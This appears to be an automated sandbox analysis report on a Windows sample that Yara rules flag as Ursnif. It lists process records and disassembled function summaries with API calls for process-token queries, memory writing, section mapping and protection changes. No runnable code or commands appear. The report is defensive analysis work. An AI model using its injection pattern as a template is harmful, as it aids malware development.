Start time:	12:13:31
Start date:	19/01/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES48CA.tmp' 'c:\Users\user\AppData\Local\Temp\xjciegge\CSCE781F4B6FB444C94B757D31BBD45D613.TMP'
Imagebase:	0x7ff77feb0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: control.exe PID: 6348 Parent PID: 6660

General

Start time:	12:13:31
Start date:	19/01/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff7028e0000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 6660 Parent PID: 6652 regsvr32.exeCOMMON

Executed Functions

Function 049FB96C, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 311memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(04A173A8), ref: 049FB98B

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

memset.NTDLL ref: 049FB9BC
RtlInitializeCriticalSection.NTDLL(05A98D20), ref: 049FB9CD

Part of subcall function 04A0D045: RtlInitializeCriticalSection.NTDLL(04A17380), ref: 04A0D069
Part of subcall function 04A0D045: RtlInitializeCriticalSection.NTDLL(04A17360), ref: 04A0D07F
Part of subcall function 04A0D045: GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A03698), ref: 04A0D090
Part of subcall function 04A0D045: GetModuleHandleA.KERNEL32(04A1801D,?,00000000), ref: 04A0D0BD

Part of subcall function 049FEAC2: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 049FEADC

CreateMutexA.KERNELBASE(00000000,00000001,00000060,?,00000000), ref: 049FB9F1
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A03698), ref: 049FBA02
CloseHandle.KERNEL32(000003B0,?,00000000), ref: 049FBA16
GetUserNameA.ADVAPI32(00000000,?), ref: 049FBA5B
RtlAllocateHeap.NTDLL(00000000,?), ref: 049FBA6E
GetUserNameA.ADVAPI32(00000000,?), ref: 049FBA83
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 049FBAB7
OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000), ref: 049FBACC
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A03698), ref: 049FBAD6
CloseHandle.KERNEL32(00000000,?,00000000), ref: 049FBAE0
GetShellWindow.USER32 ref: 049FBAFB
GetWindowThreadProcessId.USER32(00000000), ref: 049FBB02
CreateEventA.KERNEL32(04A17160,00000001,00000000,00000000,61636F4C,00000001,?,?,?,00000000), ref: 049FBB8C
RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 049FBBB4
OpenEventA.KERNEL32(00100000,00000000,05A989B8,?,00000000), ref: 049FBBDF
CreateEventA.KERNEL32(04A17160,00000001,00000000,?,?,00000000), ref: 049FBBF5
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A03698), ref: 049FBBFB
LoadLibraryA.KERNEL32(ADVAPI32.DLL,?,00000000), ref: 049FBC92
SetEvent.KERNEL32(?,04A10AF9,00000000,00000000,?,00000000), ref: 049FBD0B
RtlAllocateHeap.NTDLL(00000000,00000043,04A10AF9), ref: 049FBD23
wsprintfA.USER32 ref: 049FBD53

Part of subcall function 04A073D1: HeapFree.KERNEL32(00000000,?,00000000,Scr,?,00000000,?,?,00000000,049FBCE8,04A10AF9,00000000,00000000), ref: 04A07443

Part of subcall function 049FE714: HeapFree.KERNEL32(00000000,?,?,?,Kill,?,?), ref: 049FE77F

Strings

ADVAPI32.DLL, xrefs: 049FBC8D
0123456789ABCDEF, xrefs: 049FB9D4

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
String ID: 0123456789ABCDEF$ADVAPI32.DLL
API String ID: 2689593651-803475220
Opcode ID: a7d0f2b8a97ada65b0321bb3f912839354514d4747af089fca3ddb2abf507240
Instruction ID: 091a0bc9fe3894f169887a17c1907e9947288fff8252742761daa851c877946c
Opcode Fuzzy Hash: a7d0f2b8a97ada65b0321bb3f912839354514d4747af089fca3ddb2abf507240
Instruction Fuzzy Hash: 56B190B9600308AFE710EF65EC8492B7BE9FB54344B15482DFA46C7160DA79FC46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04A03589, Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(05A985A8,00000000,0000005C,00000000,00000001,4D283A53,00000000,04A17114,00000000,?), ref: 04A035C5
_strupr.NTDLL ref: 04A035DB
lstrlen.KERNEL32(05A985A8), ref: 04A035E3
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000001,4D283A53,00000000,04A17114,00000000,?), ref: 04A0365E
RtlAddVectoredExceptionHandler.NTDLL(00000000,049F847E), ref: 04A03685
GetLastError.KERNEL32(?), ref: 04A0369F
RtlRemoveVectoredExceptionHandler.NTDLL(02C905B8), ref: 04A036B5

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
String ID:
API String ID: 2251957091-0
Opcode ID: bfebba17b5d1c31cd4a768ed942afad34c28479b14c2b8f62e7d6788e73187e5
Instruction ID: 6c36ec64b135c05c52a2bd75be12e7cd3a03c320815f4446aa29d9c7783a0af1
Opcode Fuzzy Hash: bfebba17b5d1c31cd4a768ed942afad34c28479b14c2b8f62e7d6788e73187e5
Instruction Fuzzy Hash: 3831E8769002509FEF20AFB4BC8896FB7A8E718750F158565EE52D72F0DB38BC428B50

Uniqueness

Uniqueness Score: -1.00%

Function 04A02131, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 04A02178
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 04A0218B
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 04A021A7

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 04A021C4
memcpy.NTDLL(?,00000000,0000001C), ref: 04A021D1
NtClose.NTDLL(?), ref: 04A021E3
NtClose.NTDLL(?), ref: 04A021ED

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 9318c7aa539c677cc7c73d69d7d051475a26d107eabc295a2d95c742d7c07def
Instruction ID: f7764199a0b7d6336c1261132455177ed7f018e054a5d09dec484af865b6d807
Opcode Fuzzy Hash: 9318c7aa539c677cc7c73d69d7d051475a26d107eabc295a2d95c742d7c07def
Instruction Fuzzy Hash: 3C211672901218BBEF01AF94DD45ADEBFBDEF58740F108062FA00AA160D7B59B459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0C4B1, Relevance: 9.2, APIs: 6, Instructions: 238nativeCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 04A0C62B

Part of subcall function 04A078A7: GetModuleHandleA.KERNEL32(4C44544E,00000000,00000000,04A0C6E9,00000000,00000000,?,00000000), ref: 04A078E5
Part of subcall function 04A078A7: memcpy.NTDLL(?,04A17284,00000018,7250775A,4772644C,4C72644C), ref: 04A07961

memcpy.NTDLL(00000018,00000000,00000018,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 04A0C679
memcpy.NTDLL(-00000040,049FC210,00000800,00000000,00000000,?,00000000), ref: 04A0C6FC
NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 04A0C73A
NtClose.NTDLL(00000000,?,00000000), ref: 04A0C761

Part of subcall function 049FD66E: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,00008664,?,00000000,00000000,?,04A0C5CC,?,00000000,00000000,?,00000000), ref: 049FD693
Part of subcall function 049FD66E: GetProcAddress.KERNEL32(00000000,7243775A), ref: 049FD6B5
Part of subcall function 049FD66E: GetProcAddress.KERNEL32(00000000,614D775A), ref: 049FD6CB
Part of subcall function 049FD66E: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049FD6E1
Part of subcall function 049FD66E: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049FD6F7
Part of subcall function 049FD66E: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049FD70D

Part of subcall function 04A038DD: NtMapViewOfSection.NTDLL(00000000,000000FF,04A0AED8,00000000,00000000,04A0AED8,?,00000002,00000000,?,00000000,00000000,04A0AED8,000000FF,?), ref: 04A0390B

Part of subcall function 04A09ACB: memcpy.NTDLL(?,?,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 04A09B3F
Part of subcall function 04A09ACB: memcpy.NTDLL(?,?,?), ref: 04A09BA6

memset.NTDLL ref: 04A0C77C

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
String ID:
API String ID: 3674896251-0
Opcode ID: 107f1e52d041d1761c41c6429084e85164959d96c2a02a13478083470b224d1d
Instruction ID: ad697bae5c03c7ea4264cb9640081e6a16549e3299797dc723bbd100e6896b8e
Opcode Fuzzy Hash: 107f1e52d041d1761c41c6429084e85164959d96c2a02a13478083470b224d1d
Instruction Fuzzy Hash: 47A14FB5E0020ADFDF15DF94D984AAEBBB4FF08314F148569E800A7290E734FA54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A03013, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 04A0303E
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04A0304B
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04A030D7
GetModuleHandleA.KERNEL32(00000000), ref: 04A030E2
RtlImageNtHeader.NTDLL(00000000), ref: 04A030EB
RtlExitUserThread.NTDLL(00000000), ref: 04A03100

Part of subcall function 049FDE18: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04A03079,?), ref: 049FDE20
Part of subcall function 049FDE18: GetVersion.KERNEL32 ref: 049FDE2F
Part of subcall function 049FDE18: GetCurrentProcessId.KERNEL32 ref: 049FDE4B
Part of subcall function 049FDE18: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 049FDE68

Part of subcall function 049F254F: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 049F25A1
Part of subcall function 049F254F: memcpy.NTDLL(?,?,?,?,?,?), ref: 049F2632
Part of subcall function 049F254F: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 049F264D

Part of subcall function 049FB864: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04A0719D), ref: 049FB88A

Part of subcall function 04A0E730: GetModuleHandleA.KERNEL32(4E52454B,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E751
Part of subcall function 04A0E730: GetProcAddress.KERNEL32(00000000,6F577349), ref: 04A0E76A
Part of subcall function 04A0E730: OpenProcess.KERNEL32(00000400,00000000,04A002B4,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E787
Part of subcall function 04A0E730: IsWow64Process.KERNEL32(00000000,00000000,04A170E8,?,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E798
Part of subcall function 04A0E730: FindCloseChangeNotification.KERNELBASE(00000000,?,?,04A002B4,00000000,04A170E8,?,00000000), ref: 04A0E7AB

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Process$Module$CreateFileHandleOpenThreadTimeVirtual$AddressAllocChangeCloseCurrentEventExitFindFreeHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 3920106194-0
Opcode ID: adb1bdfb3c0b4c52d8df3565f1568d85d671d01be9a3e6ff81823eced0b5d43e
Instruction ID: f072a194bb4e9325e0802aa521acbbd7a175d2a2db00703f85d1c8c3f0af71d7
Opcode Fuzzy Hash: adb1bdfb3c0b4c52d8df3565f1568d85d671d01be9a3e6ff81823eced0b5d43e
Instruction Fuzzy Hash: 0B31D771A41114EFEF21EF64EC849ADBBB8FB54754F118169ED02E72A0D634ED01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04A0AE64, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 04A0AEC1

Part of subcall function 04A038DD: NtMapViewOfSection.NTDLL(00000000,000000FF,04A0AED8,00000000,00000000,04A0AED8,?,00000002,00000000,?,00000000,00000000,04A0AED8,000000FF,?), ref: 04A0390B

memset.NTDLL ref: 04A0AEE5

Strings

@, xrefs: 04A0AEB1

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 5eb543712222d4d6089e4132d9c8cad820650750f9713ab09ad72dd422756a65
Instruction ID: 3e3c96fcc0f12d6d8d015ca5fd3c298a0bb26d88ce3942c97d980faff4f38b61
Opcode Fuzzy Hash: 5eb543712222d4d6089e4132d9c8cad820650750f9713ab09ad72dd422756a65
Instruction Fuzzy Hash: 25211FB1E00209AFDB11DFA9D8849EEFBF9EF48354F108569E515F3250E730AA448F64

Uniqueness

Uniqueness Score: -1.00%

Function 04A0EDF2, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000318), ref: 04A0EE17
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04A0EE33

Part of subcall function 049F253A: RtlAllocateHeap.NTDLL(00000000,?,04A01450), ref: 049F2546

Part of subcall function 049FB8EB: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 049FB914
Part of subcall function 049FB8EB: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04A0EE74,00000000,00000000,00000028,00000100), ref: 049FB936

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04A0EF9D

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: 6de433edff8e6dc6c5ad0a195ac88b4874c504902217a5626ece1daad2dc8e43
Instruction ID: 4d20a67f650a000e015aa55f5745fb99becb4e8ce7b89b696e7174a832bb1ed1
Opcode Fuzzy Hash: 6de433edff8e6dc6c5ad0a195ac88b4874c504902217a5626ece1daad2dc8e43
Instruction Fuzzy Hash: B6615F71A0061AEFDB14DF94D880BAEB7B5FF48304F108469E905E7291DB70F951DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0DB15, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 04A0DB29
GetProcAddress.KERNEL32(6F57775A), ref: 04A0DB51
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04A0DB6F

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: d29fcecb4d9824b2f1ca51cc3e2e9100d82cd5fc4ed716a5cf99fe59a947744e
Instruction ID: ffb7c6e7d4000d5a17033ece0c54e4a202563cf2f4f56418e07ded21cf92651c
Opcode Fuzzy Hash: d29fcecb4d9824b2f1ca51cc3e2e9100d82cd5fc4ed716a5cf99fe59a947744e
Instruction Fuzzy Hash: 93117076A01219AFEB10DF94ED45FA97BB8EB95714F044024ED04AB2A0E774ED05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 049F75AA, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(04A0BEC6,00000000,00000000,04A0BEC6,00003000,00000040), ref: 049F75DB
RtlNtStatusToDosError.NTDLL(00000000), ref: 049F75E2
SetLastError.KERNEL32(00000000), ref: 049F75E9

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Error$AllocateLastMemoryStatusVirtual
String ID:
API String ID: 722216270-0
Opcode ID: 63bf043652bb855616acab1e57b19ea82bd335355f23c12e9ca834593d1aaec2
Instruction ID: 73c135a82dbe4f0781581abdde5cfe1b0071de0f2373ade0158ca91b641881f3
Opcode Fuzzy Hash: 63bf043652bb855616acab1e57b19ea82bd335355f23c12e9ca834593d1aaec2
Instruction Fuzzy Hash: B9F0DAB1521309BBEF05CB95DD09BAEB6BCEB24315F104058A601A6080EBB8AB04DB64

Uniqueness

Uniqueness Score: -1.00%

Function 04A0547E, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,04A0BF68,00000000,?,04A0BF68,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 04A0549C
RtlNtStatusToDosError.NTDLL(C0000002), ref: 04A054AB
SetLastError.KERNEL32(00000000,?,04A0BF68,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 04A054B2

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Error$LastMemoryStatusVirtualWrite
String ID:
API String ID: 1089604434-0
Opcode ID: 9eafe1c35800286aeb5faa2cad34945e76cbbdaea0f901a4f7cff0d7dd07ea82
Instruction ID: e35f68515750c0490b90e591953d4016ec5b8bfc1a0bc2b629c582f19fb5d2a0
Opcode Fuzzy Hash: 9eafe1c35800286aeb5faa2cad34945e76cbbdaea0f901a4f7cff0d7dd07ea82
Instruction Fuzzy Hash: ABE0B83260122ABBDF015FE5ED04DDA7B6EEF1C761B408010BE01D6160D736D8619FE0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0F46C, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(049FBB49,00000000,?,?,63699BC3,049FBB49,?,?), ref: 04A0F4A9
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,049FBB49,?,?), ref: 04A0F50A

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: e57bdb655237911764d3748befd1293382ccb998a009280ec835f415c5c5f294
Instruction ID: ac07515a208a0f5d78d97ff250bcc04fcc7ebc04f85ba990c390f6508050606d
Opcode Fuzzy Hash: e57bdb655237911764d3748befd1293382ccb998a009280ec835f415c5c5f294
Instruction Fuzzy Hash: A2110AB5900109FFDF10EBA0E944B9E77BCEB18308F109062EA05F21A0D778AB45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 049FB8EB, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(6F57775A,00000000), ref: 049FB914
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04A0EE74,00000000,00000000,00000028,00000100), ref: 049FB936

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: 720df0e56658299de39dab70c415dbabe10d9b32d9ba507241a2c51c626b1317
Instruction ID: ece06980e2ed0ee73913a98d2fe00e39aa16c115a658aa3c54f9f6089144da24
Opcode Fuzzy Hash: 720df0e56658299de39dab70c415dbabe10d9b32d9ba507241a2c51c626b1317
Instruction Fuzzy Hash: 03F01D79500104BFDB128F95DC44CAEBBFEFB98350B184129F944D2130D771EA92DB60

Uniqueness

Uniqueness Score: -1.00%

Function 04A038DD, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,04A0AED8,00000000,00000000,04A0AED8,?,00000002,00000000,?,00000000,00000000,04A0AED8,000000FF,?), ref: 04A0390B

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction ID: 56dafd3a2a17517749f3ed4aa4c5ffc61b902fe74d406c51d2e25120c4ac99ad
Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction Fuzzy Hash: 2DF012B690020CFFEB119FA5DC85C9FBBBDEB44384B00882AF642E1050D231AE189B60

Uniqueness

Uniqueness Score: -1.00%

Function 04A0E3F9, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04A17380), ref: 04A0E410

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 50e0dbb2ab3ae3d620c19613858fe540b9bd254aa2d71bb6ac8453bf2173d436
Instruction ID: 72234a3b7707e9f1001052591e3eb9c435b256463e427c20dcaa379cbc21394a
Opcode Fuzzy Hash: 50e0dbb2ab3ae3d620c19613858fe540b9bd254aa2d71bb6ac8453bf2173d436
Instruction Fuzzy Hash: AAF05E313111159BCB20DF69E884DABBBB8EF117547808414ED05DB2A4D332FD06EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 04A0F22B, Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,049F1A0B), ref: 04A0F254
RtlDeleteCriticalSection.NTDLL(04A17360), ref: 04A0F287
RtlDeleteCriticalSection.NTDLL(04A17380), ref: 04A0F28E
ReleaseMutex.KERNEL32(000003B0,00000000,?,?,?,049F1A0B), ref: 04A0F2B7
FindCloseChangeNotification.KERNELBASE(?,?,049F1A0B), ref: 04A0F2C3
ResetEvent.KERNEL32(00000000,00000000,?,?,?,049F1A0B), ref: 04A0F2CF
CloseHandle.KERNEL32(?,?,049F1A0B), ref: 04A0F2DB
SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,049F1A0B), ref: 04A0F2E1
SleepEx.KERNEL32(00000064,00000001,?,?,049F1A0B), ref: 04A0F2F5
HeapFree.KERNEL32(00000000,00000000,?,?,049F1A0B), ref: 04A0F319
RtlRemoveVectoredExceptionHandler.NTDLL(02C905B8), ref: 04A0F34F
SleepEx.KERNELBASE(00000064,00000001,?,?,049F1A0B), ref: 04A0F36B
FindCloseChangeNotification.KERNELBASE(05A98590,?,?,049F1A0B), ref: 04A0F394
LocalFree.KERNEL32(?,?,049F1A0B), ref: 04A0F3A4

Part of subcall function 049F5CA8: GetVersion.KERNEL32(?,?,74B5F720,?,04A0F243,00000000,?,?,?,049F1A0B), ref: 049F5CCC
Part of subcall function 049F5CA8: GetModuleHandleA.KERNEL32(NTDLL.DLL,LdrUnregisterDllNotification,?,74B5F720,?,04A0F243,00000000,?,?,?,049F1A0B), ref: 049F5CE0
Part of subcall function 049F5CA8: GetProcAddress.KERNEL32(00000000), ref: 049F5CE7

Part of subcall function 049FCA76: RtlEnterCriticalSection.NTDLL(04A17380), ref: 049FCA80
Part of subcall function 049FCA76: RtlLeaveCriticalSection.NTDLL(04A17380), ref: 049FCABC

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSectionSleep$Close$ChangeDeleteFindFreeHandleNotification$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 1259384122-0
Opcode ID: 19f68ee9ba640dc7430200b1eccc99b219ef8059b47a90e521d0f003d7fb92cd
Instruction ID: d8fa245ee3a05faa65ac4954949980532a23d3af60285313542971937a69e4fc
Opcode Fuzzy Hash: 19f68ee9ba640dc7430200b1eccc99b219ef8059b47a90e521d0f003d7fb92cd
Instruction Fuzzy Hash: 4A418179640301AFFB30AFA5FC44B5677A9EB24710B059025F914EB1E0CBB9FC428B61

Uniqueness

Uniqueness Score: -1.00%

Function 04A0DBAB, Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,?,049F19EE,?), ref: 04A0DBF9
VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,049F19EE,?), ref: 04A0DC0B
lstrcpy.KERNEL32(00000000,?), ref: 04A0DC1A
VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,049F19EE,?), ref: 04A0DC2B
VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000400,04A13598,00000018,04A0278C,?,?,?,00000000,?,049F19EE,?,?), ref: 04A0DC62
VirtualProtect.KERNELBASE(?,00000004,?,?,?,?,?,00000000,?,049F19EE,?,?,?,00000000,00000000), ref: 04A0DC7D
VirtualProtect.KERNEL32(?,00000004,00000040,?,04A13598,00000018,04A0278C,?,?,?,00000000,?,049F19EE,?,?,?), ref: 04A0DC92
VirtualProtect.KERNELBASE(?,00000004,00000040,?,04A13598,00000018,04A0278C,?,?,?,00000000,?,049F19EE,?,?,?), ref: 04A0DCBF
VirtualProtect.KERNELBASE(?,00000004,?,?,?,?,?,00000000,?,049F19EE,?,?,?,00000000,00000000), ref: 04A0DCD9
GetLastError.KERNEL32(?,?,?,00000000,?,049F19EE,?,?,?,00000000,00000000), ref: 04A0DCE0

Memory Dump Source

Source File: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, Offset: 049F0000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: 7fe9abd5dc16a8624a6c3660d020e2ae3280d5c3fe8eb3ad05db7e8d2694e395
Instruction ID: 3fb6d9e49bfe918e40b5ff392ae5116e117df3c9b97cccc33488247b0378cf0f
Opcode Fuzzy Hash: 7fe9abd5dc16a8624a6c3660d020e2ae3280d5c3fe8eb3ad05db7e8d2694e395
Instruction Fuzzy Hash: 95412EB2904709AFEF21DFA5DC44EAAB7B5FB08310F008515EA52A65A0D775F806DF60

Uniqueness

Uniqueness Score: -1.00%

Function 049FD9EE, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 049F934C: VirtualProtect.KERNELBASE(00000000,00000000,00000040,049F1980,?,?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F9371
Part of subcall function 049F934C: GetLastError.KERNEL32(?,00000000,?,00000000,?,?,049F1980,00000000,00000000), ref: 049F9379
